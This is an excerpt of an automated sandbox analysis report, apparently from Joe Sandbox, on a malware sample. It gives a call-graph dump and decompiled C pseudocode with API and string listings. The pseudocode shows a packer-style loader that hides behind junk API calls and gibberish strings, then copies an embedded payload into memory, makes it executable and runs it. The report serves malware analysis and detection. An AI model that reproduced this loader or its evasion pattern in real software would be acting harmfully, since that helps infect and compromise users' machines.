LeaveCriticalSection 18145->18188 18147 b81534 18147->18135 18149 b8163a 18148->18149 18150 b815a2 18148->18150 18170 b8e640 GetCurrentDirectoryA 18149->18170 18167 b817f0 18150->18167 18153 b816b1 GetFullPathNameA 18157 b8170a GetLastError 18153->18157 18162 b81720 18153->18162 18154 b815ab ___doserrno 18158 b81638 18154->18158 18160 b81608 18154->18160 18155 b81681 18159 b809f0 __invalid_parameter 16 API calls 18155->18159 18166 b8162e ___doserrno __dosmaperr 18157->18166 18158->18153 18158->18155 18159->18166 18161 b809f0 __invalid_parameter 16 API calls 18160->18161 18161->18166 18163 b817a7 GetFullPathNameA 18162->18163 18162->18166 18164 b817ce GetLastError 18163->18164 18165 b817c6 18163->18165 18164->18166 18165->18164 18165->18166 18166->18144 18168 b81805 GetDriveTypeA 18167->18168 18169 b817fe 18167->18169 18168->18169 18169->18154 18171 b8e713 18170->18171 18174 b8e6a0 18170->18174 18173 b8e741 18171->18173 18178 b940f0 18171->18178 18175 b805d0 setSBUpLow 5 API calls 18173->18175 18174->18171 18176 b8e6f6 GetCurrentDirectoryA 18174->18176 18177 b8e77e 18175->18177 18176->18171 18177->18158 18179 b94123 18178->18179 18181 b940ff 18178->18181 18182 b93f10 18179->18182 18181->18173 18183 b93f24 __woutput_s_l 18182->18183 18184 b8c6c0 __isctype_l 30 API calls 18183->18184 18185 b93f64 __woutput_s_l _LocaleUpdate::~_LocaleUpdate __chvalidator_l __isleadbyte_l 18183->18185 18184->18185 18186 b8ea90 ___crtLCMapStringA 42 API calls 18185->18186 18187 b93f8c __woutput_s_l _LocaleUpdate::~_LocaleUpdate 18185->18187 18186->18187 18187->18181 18188->18147 18191 b824e0 18189->18191 18190 b82507 18192 b809f0 __invalid_parameter 16 API calls 18190->18192 18191->18190 18196 b82537 18191->18196 18193 b8252d 18192->18193 18194 b805d0 setSBUpLow 5 API calls 18193->18194 18195 b82dfe 18194->18195 18195->18081 18196->18193 18200 b8e880 18196->18200 18203 b8e8ba ___shl_12 ___add_12 18200->18203 18201 b805d0 setSBUpLow 5 API calls 18202 b82c9d 18201->18202 18202->18193 18204 b82f10 18202->18204 18203->18201 18205 b82f33 18204->18205 18208 b82f38 18204->18208 18206 b805d0 setSBUpLow 5 API calls 18205->18206 18207 b82fe1 18206->18207 18207->18193 18208->18205 18210 b82ff0 18208->18210 18213 b83084 ___addl ___shr_12 ___shl_12 18210->18213 18211 b805d0 setSBUpLow 5 API calls 18212 b833e2 18211->18212 18212->18208 18213->18211 18215 b7a4f3 18214->18215 18216 b7a4f1 18214->18216 18215->18216 18219 b7a521 18215->18219 18224 b7ab70 18215->18224 18216->18087 18228 b7a6e0 18219->18228 18221 b7a4ba _Debug_pointer 18220->18221 18258 b7a5f0 18221->18258 18223 b7a3c0 18223->18050 18225 b7ab79 18224->18225 18231 b7ac50 18225->18231 18250 b7c080 18228->18250 18234 b786d0 18231->18234 18237 b78610 18234->18237 18240 b7c350 18237->18240 18239 b7862c 18239->18219 18241 b7c365 18240->18241 18243 b7c35e __realloc_base 18240->18243 18242 b7c39b 18241->18242 18244 b7c3cb _memset 18241->18244 18245 b809f0 __invalid_parameter 16 API calls 18242->18245 18243->18239 18244->18243 18246 b7c425 18244->18246 18247 b7c452 18244->18247 18245->18243 18248 b809f0 __invalid_parameter 16 API calls 18246->18248 18247->18243 18249 b809f0 __invalid_parameter 16 API calls 18247->18249 18248->18243 18249->18243 18251 b7c0bd 18250->18251 18253 b7a6f0 18250->18253 18254 b7c14a 18251->18254 18253->18216 18257 b81290 LeaveCriticalSection 18254->18257 18256 b7c151 18256->18253 18257->18256 18259 b7a5fd _Debug_pointer 18258->18259 18260 b7a626 18259->18260 18261 b7a648 18259->18261 18267 b7a700 18260->18267 18280 b7a7c0 18261->18280 18264 b7a646 18264->18223 18265 b7a656 18265->18264 18266 b7ab70 16 API calls 18265->18266 18266->18264 18268 b7a711 18267->18268 18270 b7a71b 18268->18270 18289 b7b0a0 18268->18289 18271 b7a764 18270->18271 18272 b7a73f 18270->18272 18274 b7a7c0 60 API calls 18271->18274 18298 b7a8a0 18272->18298 18278 b7a772 18274->18278 18275 b7a754 18276 b7a8a0 60 API calls 18275->18276 18277 b7a762 18276->18277 18277->18264 18278->18277 18279 b7ab70 16 API calls 18278->18279 18279->18277 18281 b7a7d1 18280->18281 18282 b7a7db 18281->18282 18373 b7ae00 18281->18373 18283 b7a7e6 18282->18283 18287 b7a7fb 18282->18287 18382 b7a9a0 18283->18382 18286 b7a7f9 18286->18265 18287->18286 18288 b7a4e0 17 API calls 18287->18288 18288->18286 18304 b7b1d0 18289->18304 18295 b7b0f5 18316 b7b2d0 18295->18316 18299 b7a8b4 18298->18299 18301 b7a8b9 18298->18301 18300 b7b0a0 std::_String_base::_Xlen 60 API calls 18299->18300 18300->18301 18303 b7a919 18301->18303 18363 b7abc0 18301->18363 18303->18275 18305 b7b205 std::_String_base::_Xlen 18304->18305 18321 b7b4b0 18305->18321 18307 b7b220 18327 b7b450 18307->18327 18310 b7b120 18347 b7aeb0 18310->18347 18313 b800e0 18314 b8010b 18313->18314 18315 b8011c RaiseException 18313->18315 18314->18315 18315->18295 18317 b7b4b0 std::runtime_error::runtime_error 17 API calls 18316->18317 18318 b7b30b 18317->18318 18357 b7b350 18318->18357 18322 b7b4c5 18321->18322 18326 b7b4c3 std::runtime_error::runtime_error 18321->18326 18323 b7b4f3 18322->18323 18322->18326 18331 b7bad0 18322->18331 18335 b7b820 18323->18335 18326->18307 18328 b7b46c _Debug_pointer std::_String_base::_Xlen 18327->18328 18338 b7b5d0 18328->18338 18330 b7b0d4 18330->18310 18332 b7badb std::runtime_error::runtime_error 18331->18332 18333 b7bb90 __wcstombs_l 16 API calls 18332->18333 18334 b7baf8 18333->18334 18334->18323 18336 b7c080 delete LeaveCriticalSection 18335->18336 18337 b7b832 18336->18337 18337->18326 18339 b7b5df _Debug_pointer std::_String_base::_Xlen 18338->18339 18340 b7b628 18339->18340 18342 b7b608 std::runtime_error::runtime_error 18339->18342 18341 b7b780 std::runtime_error::runtime_error 60 API calls 18340->18341 18345 b7b636 std::runtime_error::runtime_error 18341->18345 18343 b7b370 std::runtime_error::runtime_error 60 API calls 18342->18343 18344 b7b626 std::runtime_error::runtime_error 18343->18344 18344->18330 18345->18344 18346 b7bad0 std::runtime_error::runtime_error 16 API calls 18345->18346 18346->18344 18348 b7aee0 std::exception::exception 18347->18348 18351 b7b250 18348->18351 18352 b7b284 std::runtime_error::runtime_error 18351->18352 18353 b7b4b0 std::runtime_error::runtime_error 17 API calls 18352->18353 18354 b7b297 18353->18354 18355 b7b370 std::runtime_error::runtime_error 60 API calls 18354->18355 18356 b7aeff 18355->18356 18356->18313 18360 b7a470 18357->18360 18361 b78730 std::_String_base::_Xlen EnterCriticalSection LeaveCriticalSection 18360->18361 18362 b7a47f 18361->18362 18362->18270 18364 b7abc9 18363->18364 18367 b7ac70 18364->18367 18370 b786f0 18367->18370 18371 b78640 _wmemcpy_s 17 API calls 18370->18371 18372 b78708 18371->18372 18372->18303 18374 b7b1d0 std::_String_base::_Xlen 60 API calls 18373->18374 18375 b7ae34 18374->18375 18390 b7ae80 18375->18390 18378 b800e0 __CxxThrowException@8 RaiseException 18379 b7ae55 18378->18379 18380 b7b2d0 std::_String_base::_Xlen 19 API calls 18379->18380 18381 b7ae64 18380->18381 18381->18282 18383 b7a9d6 18382->18383 18393 b7ab20 18383->18393 18385 b7aa46 18388 b7ab70 16 API calls 18385->18388 18389 b7aadb 18385->18389 18386 b7a4e0 17 API calls 18387 b7aaea 18386->18387 18387->18286 18388->18389 18389->18386 18391 b7aeb0 std::runtime_error::runtime_error 60 API calls 18390->18391 18392 b7ae47 18391->18392 18392->18378 18396 b7abf0 18393->18396 18397 b7ac05 18396->18397 18398 b7abfc 18396->18398 18397->18398 18404 b78590 18397->18404 18407 b7cd30 18398->18407 18403 b800e0 __CxxThrowException@8 RaiseException 18403->18398 18405 b7be70 std::exception::exception 16 API calls 18404->18405 18406 b785a3 18405->18406 18406->18403 18411 b7cd38 std::bad_alloc::bad_alloc _malloc 18407->18411 18408 b7ab32 18408->18385 18409 b856b0 __callnewh 6 API calls 18409->18411 18410 b7a420 std::bad_exception::bad_exception 16 API calls 18410->18411 18411->18408 18411->18409 18411->18410 18412 b7de20 _atexit 57 API calls 18411->18412 18413 b800e0 __CxxThrowException@8 RaiseException 18411->18413 18412->18411 18413->18411 18415 b7a470 std::_String_base::_Xlen 2 API calls 18414->18415 18416 b7a3fb 18415->18416 18416->18047 18420 b85ba7 _doexit 18417->18420 18418 b85d1a 18458 b85d28 18418->18458 18419 b85c5a __initterm 18419->18418 18438 b7f730 18419->18438 18420->18418 18420->18419 18422 b849c0 __encode_pointer 6 API calls 18420->18422 18425 b85be3 18422->18425 18423 b85972 18423->17555 18425->18419 18428 b849c0 __encode_pointer 6 API calls 18425->18428 18426 b85df0 _doexit LeaveCriticalSection 18429 b85d4b 18426->18429 18436 b85bff 18428->18436 18431 b85db0 ___crtExitProcess 3 API calls 18429->18431 18431->18423 18433 b85d15 18453 b80040 18433->18453 18435 b849a0 7 API calls __init_pointers 18435->18436 18436->18419 18436->18435 18437 b849c0 6 API calls __encode_pointer 18436->18437 18437->18436 18440 b7f770 18438->18440 18439 b7f7c1 18441 b809f0 __invalid_parameter 16 API calls 18439->18441 18440->18439 18442 b7f7f1 18440->18442 18444 b7f7e7 18441->18444 18462 b7f856 18442->18462 18444->18418 18445 b85a20 18444->18445 18446 b85a30 18445->18446 18447 b849c0 __encode_pointer 6 API calls 18446->18447 18448 b85af1 18447->18448 18449 b849a0 __init_pointers 7 API calls 18448->18449 18450 b85b16 InterlockedDecrement 18449->18450 18451 b85b2b 18450->18451 18452 b85b52 InterlockedIncrement 18450->18452 18451->18452 18452->18433 18466 b7f930 18453->18466 18455 b80051 18456 b80098 18455->18456 18473 b7fb50 18455->18473 18456->18418 18459 b85d2e 18458->18459 18460 b85d26 18458->18460 18461 b85df0 _doexit LeaveCriticalSection 18459->18461 18460->18423 18460->18426 18461->18460 18465 b81290 LeaveCriticalSection 18462->18465 18464 b7f85d 18464->18444 18465->18464 18467 b7f974 18466->18467 18468 b7f99b 18467->18468 18472 b7f9c9 18467->18472 18469 b809f0 __invalid_parameter 16 API calls 18468->18469 18470 b7f9c1 18469->18470 18470->18455 18477 b7fb2b 18472->18477 18474 b7fb6b __woutput_s_l 18473->18474 18481 b7fb90 18474->18481 18476 b7fb7d _LocaleUpdate::~_LocaleUpdate 18476->18456 18480 b81290 LeaveCriticalSection 18477->18480 18479 b7fb32 18479->18470 18480->18479 18482 b7fbd0 18481->18482 18483 b7fe4c 18482->18483 18486 b7fc30 _CrtMemDumpAllObjectsSince_stat 18482->18486 18511 b7fe5a 18483->18511 18485 b7fe58 18485->18476 18487 b7fca2 18486->18487 18488 b7fc8f IsBadReadPtr 18486->18488 18498 b7fc6a 18486->18498 18489 b7fda9 18487->18489 18490 b7fd26 18487->18490 18488->18487 18491 b7fdb2 18489->18491 18494 b7fded 18489->18494 18492 b7fd94 18490->18492 18493 b7fd68 IsBadReadPtr 18490->18493 18496 b7fea0 __printMemBlockData 65 API calls 18491->18496 18499 b7fea0 18492->18499 18493->18492 18493->18498 18497 b7fea0 __printMemBlockData 65 API calls 18494->18497 18494->18498 18496->18498 18497->18498 18498->18476 18500 b7febe 18499->18500 18501 b7fffd _LocaleUpdate::~_LocaleUpdate 18500->18501 18502 b7fef7 __woutput_s_l 18500->18502 18503 b805d0 setSBUpLow 5 API calls 18501->18503 18506 b7ff3a __woutput_s_l __chvalidator_l 18502->18506 18514 b8c6c0 18502->18514 18504 b8003a 18503->18504 18504->18498 18518 b8c5b0 18506->18518 18508 b7ffeb 18508->18498 18509 b7ffbd 18509->18508 18521 b7dc00 18509->18521 18561 b81290 LeaveCriticalSection 18511->18561 18513 b7fe61 18513->18485 18515 b8c6d4 __woutput_s_l __isleadbyte_l 18514->18515 18516 b8f0e0 ___crtLCMapStringW 30 API calls 18515->18516 18517 b8c6e3 __woutput_s_l _LocaleUpdate::~_LocaleUpdate 18515->18517 18516->18517 18517->18506 18525 b91d10 18518->18525 18520 b8c5d3 18520->18509 18522 b7dc1b 18521->18522 18523 b7dc0b 18521->18523 18522->18508 18523->18522 18524 b80a60 __invoke_watson 10 API calls 18523->18524 18524->18522 18527 b91d31 18525->18527 18526 b91d58 18528 b809f0 __invalid_parameter 16 API calls 18526->18528 18527->18526 18532 b91d89 18527->18532 18534 b91d7e _memset 18528->18534 18529 b91e09 18537 b91b40 18529->18537 18530 b91dd8 18533 b809f0 __invalid_parameter 16 API calls 18530->18533 18532->18529 18532->18530 18533->18534 18534->18520 18535 b91e27 _memset 18535->18534 18536 b809f0 __invalid_parameter 16 API calls 18535->18536 18536->18534 18538 b91b60 18537->18538 18539 b91b84 18538->18539 18540 b91bb2 18538->18540 18541 b809f0 __invalid_parameter 16 API calls 18539->18541 18542 b91c2c 18540->18542 18543 b91bfe 18540->18543 18545 b91ba7 18541->18545 18542->18545 18547 b904f0 18542->18547 18544 b809f0 __invalid_parameter 16 API calls 18543->18544 18544->18545 18545->18535 18548 b904fe 18547->18548 18549 b874a0 __fileno 16 API calls 18548->18549 18555 b9052b __flswbuf 18549->18555 18550 b90648 __getbuf 18551 b9066d 18550->18551 18552 b90766 18550->18552 18554 b906cc 18551->18554 18559 b906e8 18551->18559 18553 b87870 __write 51 API calls 18552->18553 18558 b9053f 18553->18558 18556 b87870 __write 51 API calls 18554->18556 18555->18550 18557 b90410 __isatty 18 API calls 18555->18557 18555->18558 18556->18558 18557->18550 18558->18545 18559->18558 18560 b91100 __lseeki64 22 API calls 18559->18560 18560->18558 18561->18513 20560 b7ef43 20561 b7ef49 _memset 20560->20561 20562 b8a9e0 __free_base 9 API calls 20561->20562 20563 b7f05e 20562->20563 18591 b7df4f 18592 b7df5b 18591->18592 18594 b7df36 18591->18594 18593 b856b0 __callnewh 6 API calls 18593->18594 18594->18591 18594->18592 18594->18593

    Control-flow Graph

    C-Code - Quality: 75%
    			E00B78A10(void* __ebx, void* __edi) {
    				long _v8;
    				void* _v10;
    				void* _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				intOrPtr _v44;
    				intOrPtr _v48;
    				intOrPtr _v52;
    				intOrPtr _v56;
    				intOrPtr _v60;
    				intOrPtr _v64;
    				intOrPtr _v68;
    				intOrPtr _v72;
    				intOrPtr _v76;
    				intOrPtr _v80;
    				intOrPtr _v84;
    				intOrPtr _v88;
    				intOrPtr _v92;
    				intOrPtr _v96;
    				intOrPtr _v100;
    				intOrPtr _v104;
    				intOrPtr _v108;
    				intOrPtr _v112;
    				intOrPtr _v116;
    				intOrPtr _v120;
    				intOrPtr _v124;
    				intOrPtr _v128;
    				intOrPtr _v132;
    				intOrPtr _v136;
    				intOrPtr _v140;
    				intOrPtr _v144;
    				intOrPtr _v148;
    				intOrPtr _v152;
    				intOrPtr _v156;
    				intOrPtr _v160;
    				intOrPtr _v164;
    				intOrPtr _v168;
    				intOrPtr _v172;
    				intOrPtr _v176;
    				intOrPtr _v180;
    				intOrPtr _v184;
    				intOrPtr _v188;
    				intOrPtr _v192;
    				long _v196;
    				intOrPtr _v200;
    				intOrPtr _v204;
    				intOrPtr _v208;
    				intOrPtr _v212;
    				long _v216;
    				intOrPtr _v220;
    				struct HINSTANCE__* _v224;
    				void* _v228;
    				struct HINSTANCE__* _v232;
    				void* _v236;
    				void* _v268;
    				void* _v272;
    				int _t106;
    				void* _t108;
    				void* _t113;
    				void* _t114;
    				void* _t115;
    				intOrPtr _t132;
    				void* _t148;
    				struct HINSTANCE__* _t149;
    				intOrPtr _t151;
    				void* _t164;
    				void* _t165;
    				intOrPtr _t166;
    				intOrPtr _t172;
    				void* _t173;
    				void* _t175;
    				void* _t177;
    				void* _t178;
    
    				_t173 = __edi;
    				_t148 = __ebx;
    				if( *0xd15000 == 0x144c) {
    					E00B7CCE0(0, 0, 0);
    					E00B7C170(0, 0, 0);
    					_t175 = _t175 + 0x18;
    					SetThreadPriority(0, 0);
    					__imp__FindVolumeClose(0);
    					GetCommConfig(0, 0,  &_v216);
    				}
    				LoadLibraryW(L"msimg32.dll"); // executed
    				_v224 = 0;
    				while(_v224 < 0x19c94690) {
    					if(_v224 < 0x9ca528b) {
    						if( *0xd15000 == 0x47e4) {
    							GetThreadPriority(0);
    							GetCommandLineW();
    							SetLastError(0);
    							GenerateConsoleCtrlEvent(1, 0xe);
    							_t172 =  *0xd12fe0; // 0x34a5040
    							__imp__MoveFileWithProgressA("Lama yobivok ciloh yefayox mew gepopa papojopi lice texoy nepixi", "Var kaquequa bitegef pel yelareke nicisifo pijose lafac jequo quesoho", 0, _t172, 1);
    						}
    						_v144 = 0x51c010d5;
    						_v76 = 0x478f21d1;
    						_v204 = 0x7acb1375;
    						_v212 = 0x3ded1f95;
    						_v216 = 0x7eb18c50;
    						_v92 = 0x348374d3;
    						_v132 = 0x578d21e9;
    						_v156 = 0x333ffb52;
    						_v116 = 0xef8c7a3;
    						_v192 = 0x6be29cb6;
    						_v140 = 0x367a1fba;
    						_v164 = 0x48d2fe42;
    						_v172 = 0x48cf01a2;
    						_v136 = 0x1e5388b5;
    						_v64 = 0x65eaf0f0;
    						_v200 = 0x453a1893;
    						_v168 = 0x387cf9be;
    						_v160 = 0x6c8f9e5d;
    						_v188 = 0x29c4285a;
    						_v80 = 0x35f0d733;
    						_v96 = 0x7c3fc7bc;
    						_v52 = 0x286a4b91;
    						_v24 = 0x47310060;
    						_v60 = 0x314b5250;
    						_v16 = 0x6ba1e96f;
    						_v36 = 0x154859de;
    						_v28 = 0x766e20ca;
    						_v184 = 0x239b2312;
    						_v208 = 0x174f56c3;
    						_v148 = 0x2d8a129d;
    						_v40 = 0x3253c6cb;
    						_v180 = 0x23a7ada9;
    						_v120 = 0x6f68acd0;
    						_v128 = 0x4016238d;
    						_v88 = 0x5e720474;
    						_v72 = 0x465ed805;
    						_v108 = 0x5d7c9434;
    						_v220 = 0x34d32523;
    						_v196 = 0x303233a3;
    						_v44 = 0x4f1d1477;
    						_v56 = 0x2e0b028;
    						_v32 = 0x43713bfc;
    						_v104 = 0x1092fa23;
    						_v124 = 0x4d4b0f12;
    						_v112 = 0x2cac1593;
    						_v84 = 0x6a468114;
    						_v152 = 0x3065dc97;
    						_v176 = 0x42ebffd3;
    						_v20 = 0x65d9df26;
    						_v68 = 0x793e52ce;
    						_v48 = 0x2b156627;
    						_v100 = 0x5332da8a;
    						GetProcessHeaps(0, 0);
    						GetLastError();
    					}
    					if(_v224 <= 0x4fea) {
    						_v224 =  &(_v224->i);
    						continue;
    					} else {
    						 *0xd12fec = GetModuleHandleW(L"KERNEL32.DLL");
    					}
    					break;
    				}
    				_v8 = 0x5db76c;
    				_t106 = GetLastError();
    				if( *0xd15000 == 0x3212) {
    					__imp__InitializeSListHead(0);
    					__imp__DebugSetProcessKillOnExit(1);
    					while(1) {
    						__imp__EnumSystemGeoID(0, 0, 0);
    						if(_t106 == 0) {
    							goto L16;
    						}
    						_t106 = HeapFree(GetProcessHeap(), 0, 0);
    					}
    				}
    				L16:
    				_t108 = E00B788F0(_v8); // executed
    				 *0xd12fe8 = _t108;
    				_t149 =  *0xd12fec; // 0x76eb0000
    				 *0xd12fdc = GetProcAddress(_t149, "VirtualProtect");
    				_t164 =  *0xd12fe8; // 0x2eb4040
    				E00B787B0(_t164, 0xb98230, 0x176ddb);
    				_t177 = _t175 + 0x10;
    				_t165 =  *0xd12fe8; // 0x2eb4040
    				VirtualProtect(_t165, _v8, 0x40,  &_v196);
    				_t113 =  *0xd12fe8; // 0x2eb4040
    				 *0xd12fe4 = _t113;
    				if( *0xd15000 == 0x34da) {
    					_v228 = LoadResource(0, 0);
    					if(_v228 != 0) {
    						 *0xd15000 =  *0xd15000 + 0xc664f;
    						GetACP();
    						FreeResource(_v228);
    					}
    				}
    				_v232 = 0;
    				while(_v232 < 0x857ce9) {
    					if(_v232 == 0x13a) {
    						 *0xd15000 =  *0xd12fe4();
    						_t132 = E00B788F0( *0xd15000); // executed
    						_t177 = _t177 + 4;
    						 *0xd12fe0 = _t132;
    					}
    					_v232 =  &(_v232->i);
    				}
    				_t166 =  *0xd15000;
    				_t114 =  *0xd12fe8; // 0x2eb4040
    				_t151 =  *0xd12fe0; // 0x34a5040
    				_t115 = E00B787B0(_t151, _t114, _t166);
    				_t178 = _t177 + 0xc;
    				 *((intOrPtr*)(_t115 + _t166 - 0x7f)) =  *((intOrPtr*)(_t115 + _t166 - 0x7f)) + _t166;
    			}

















































































    0x00b78a10
    0x00b78a10
    0x00b78a23
    0x00b78a2b
    0x00b78a39
    0x00b78a3e
    0x00b78a45
    0x00b78a4d
    0x00b78a5e
    0x00b78a5e
    0x00b78a69
    0x00b78a6f
    0x00b78a8a
    0x00b78aa4
    0x00b78ab4
    0x00b78ab8
    0x00b78abe
    0x00b78ac6
    0x00b78ad0
    0x00b78ad8
    0x00b78aeb
    0x00b78aeb
    0x00b78af1
    0x00b78afb
    0x00b78b02
    0x00b78b0c
    0x00b78b16
    0x00b78b20
    0x00b78b27
    0x00b78b2e
    0x00b78b38
    0x00b78b3f
    0x00b78b49
    0x00b78b53
    0x00b78b5d
    0x00b78b67
    0x00b78b71
    0x00b78b78
    0x00b78b82
    0x00b78b8c
    0x00b78b96
    0x00b78ba0
    0x00b78ba7
    0x00b78bae
    0x00b78bb5
    0x00b78bbc
    0x00b78bc3
    0x00b78bca
    0x00b78bd1
    0x00b78bd8
    0x00b78be2
    0x00b78bec
    0x00b78bf6
    0x00b78bfd
    0x00b78c07
    0x00b78c0e
    0x00b78c15
    0x00b78c1c
    0x00b78c23
    0x00b78c2a
    0x00b78c34
    0x00b78c3e
    0x00b78c45
    0x00b78c4c
    0x00b78c53
    0x00b78c5a
    0x00b78c61
    0x00b78c68
    0x00b78c6f
    0x00b78c79
    0x00b78c83
    0x00b78c8a
    0x00b78c91
    0x00b78c98
    0x00b78ca3
    0x00b78ca9
    0x00b78ca9
    0x00b78cb9
    0x00b78a84
    0x00000000
    0x00b78cbb
    0x00b78cc6
    0x00b78cc6
    0x00000000
    0x00b78cb9
    0x00b78cd2
    0x00b78cd9
    0x00b78ce9
    0x00b78ced
    0x00b78cf5
    0x00b78cfb
    0x00b78d01
    0x00b78d09
    0x00000000
    0x00000000
    0x00b78d16
    0x00b78d16
    0x00b78cfb
    0x00b78d1e
    0x00b78d22
    0x00b78d2a
    0x00b78d34
    0x00b78d41
    0x00b78d50
    0x00b78d57
    0x00b78d5c
    0x00b78d6c
    0x00b78d73
    0x00b78d79
    0x00b78d7e
    0x00b78d8d
    0x00b78d99
    0x00b78da6
    0x00b78db4
    0x00b78dba
    0x00b78dc7
    0x00b78dc7
    0x00b78da6
    0x00b78dcd
    0x00b78de8
    0x00b78dfe
    0x00b78e06
    0x00b78e12
    0x00b78e17
    0x00b78e1a
    0x00b78e1a
    0x00b78de2
    0x00b78de2
    0x00b78e21
    0x00b78e28
    0x00b78e2e
    0x00b78e35
    0x00b78e3a
    0x00b78e46

    APIs
    • __wcstoui64.LIBCMTD ref: 00B78A2B
      • Part of subcall function 00B7CCE0: wcstoxq.LIBCMTD ref: 00B7CD01
    • __wdupenv_s.LIBCMTD ref: 00B78A39
      • Part of subcall function 00B7C170: __fullpath_dbg.LIBCMTD ref: 00B7C187
    • SetThreadPriority.KERNEL32(00000000,00000000), ref: 00B78A45
    • FindVolumeClose.KERNEL32(00000000), ref: 00B78A4D
    • GetCommConfig.KERNEL32(00000000,00000000,?), ref: 00B78A5E
    • LoadLibraryW.KERNELBASE(msimg32.dll), ref: 00B78A69
    • GetThreadPriority.KERNEL32(00000000), ref: 00B78AB8
    • GetCommandLineW.KERNEL32 ref: 00B78ABE
    • SetLastError.KERNEL32(00000000), ref: 00B78AC6
    • GenerateConsoleCtrlEvent.KERNEL32(00000001,0000000E), ref: 00B78AD0
    • MoveFileWithProgressA.KERNEL32(Lama yobivok ciloh yefayox mew gepopa papojopi lice texoy nepixi,Var kaquequa bitegef pel yelareke nicisifo pijose lafac jequo quesoho,00000000,034A5040,00000001), ref: 00B78AEB
    • GetProcessHeaps.KERNEL32(00000000,00000000), ref: 00B78CA3
    • GetLastError.KERNEL32 ref: 00B78CA9
    • GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 00B78CC0
    • GetLastError.KERNEL32 ref: 00B78CD9
    • InitializeSListHead.KERNEL32(00000000), ref: 00B78CED
    • DebugSetProcessKillOnExit.KERNEL32 ref: 00B78CF5
    • EnumSystemGeoID.KERNEL32 ref: 00B78D01
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: ErrorLast$PriorityProcessThread$CloseCommCommandConfigConsoleCtrlDebugEnumEventExitFileFindGenerateHandleHeadHeapsInitializeKillLibraryLineListLoadModuleMoveProgressSystemVolumeWith__fullpath_dbg__wcstoui64__wdupenv_swcstoxq
    • String ID: KERNEL32.DLL$Lama yobivok ciloh yefayox mew gepopa papojopi lice texoy nepixi$PRK1$Var kaquequa bitegef pel yelareke nicisifo pijose lafac jequo quesoho$VirtualProtect$`$director$msimg32.dll$O
    • API String ID: 4052567342-796003639
    • Opcode ID: d11eb1eadb59ce4ff0e55ef5ede231e9e522a6d3f3111d2d934fd39b27ea6225
    • Instruction ID: 92581a20b41c48f1a87f2f5ed9c945f94bab1ebbc2aa355778fbb29c05a29dd2
    • Opcode Fuzzy Hash: d11eb1eadb59ce4ff0e55ef5ede231e9e522a6d3f3111d2d934fd39b27ea6225
    • Instruction Fuzzy Hash: CED13AB4944348EFDB20DF94ED49B9DBBB0FB04701F50C599E21EAA290CBB11985CF65
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 80%
    			E00B788F0(long _a4) {
    				void* _v8;
    				void* _v12;
    				void* _t21;
    
    				_v8 = 0;
    				if( *0xd15000 == 0x5d07 ||  *0xd15000 == 0x2d57) {
    					SearchPathW(L"Mifi vako leyoni famegof kohev kiwiheta gajibig", L"Sabet xedalihi gicise mopof ribilok",  &M00B77F04, 0x104, L"sipoq negarir", 0);
    					__imp__FindActCtxSectionStringW(0, 0, 0, L"Fotew gadet vaxecafo boc roqueh", 0);
    					_t26 = _v8;
    					ResetWriteWatch(_v8, _a4);
    					FoldStringA(1, "jan qued cahirek hite sonanon", 0x104, "sivawil copace coca pisej queh poxeki wicevaq", 0xe);
    					SetCommTimeouts(0, 0);
    				}
    				GetLastError();
    				_t21 = E00B7C050(_t26, _a4); // executed
    				_v8 = _t21;
    				if(_v8 == 0) {
    					ExitProcess(0);
    				} else {
    					if( *0xd15000 == 0x37df) {
    						__imp__MoveFileTransactedW(L"Vite fodi malavi quakosel mewaril quefes quogo cabeme heg quamowi", L"Sele cegen tarexan", 0, _v8, 1, 0);
    						_v12 = CreateThread(0, _a4, 0, _v8, 1, 0xd15000);
    						if(_v12 != 0xffffffff) {
    							SwitchToFiber(_v8);
    							DeleteFiber(_v8);
    						}
    						SetFileApisToANSI();
    					}
    					return _v8;
    				}
    			}






    0x00b788f6
    0x00b78907
    0x00b78930
    0x00b78943
    0x00b7894d
    0x00b78951
    0x00b7896a
    0x00b78974
    0x00b78974
    0x00b7897a
    0x00b78984
    0x00b7898c
    0x00b78993
    0x00b789fe
    0x00b78995
    0x00b7899f
    0x00b789b5
    0x00b789d4
    0x00b789db
    0x00b789e1
    0x00b789eb
    0x00b789eb
    0x00b789f1
    0x00b789f1
    0x00000000
    0x00b789f7

    APIs
    • SearchPathW.KERNEL32(Mifi vako leyoni famegof kohev kiwiheta gajibig,Sabet xedalihi gicise mopof ribilok,kijosop,00000104,sipoq negarir,00000000), ref: 00B78930
    • FindActCtxSectionStringW.KERNEL32(00000000,00000000,00000000,Fotew gadet vaxecafo boc roqueh,00000000), ref: 00B78943
    • ResetWriteWatch.KERNEL32(00000000,?), ref: 00B78951
    • FoldStringA.KERNEL32(00000001,jan qued cahirek hite sonanon,00000104,sivawil copace coca pisej queh poxeki wicevaq,0000000E), ref: 00B7896A
    • SetCommTimeouts.KERNEL32(00000000,00000000), ref: 00B78974
    • GetLastError.KERNEL32 ref: 00B7897A
    • _malloc.LIBCMTD ref: 00B78984
    • MoveFileTransactedW.KERNEL32(Vite fodi malavi quakosel mewaril quefes quogo cabeme heg quamowi,Sele cegen tarexan,00000000,00000000,00000001,00000000), ref: 00B789B5
    • CreateThread.KERNEL32 ref: 00B789CE
    • SwitchToFiber.KERNEL32(00000000), ref: 00B789E1
    • DeleteFiber.KERNEL32(00000000), ref: 00B789EB
    • SetFileApisToANSI.KERNEL32 ref: 00B789F1
    • ExitProcess.KERNEL32 ref: 00B789FE
    Strings
    • sipoq negarir, xrefs: 00B78917
    • jan qued cahirek hite sonanon, xrefs: 00B78963
    • Vite fodi malavi quakosel mewaril quefes quogo cabeme heg quamowi, xrefs: 00B789B0
    • Mifi vako leyoni famegof kohev kiwiheta gajibig, xrefs: 00B7892B
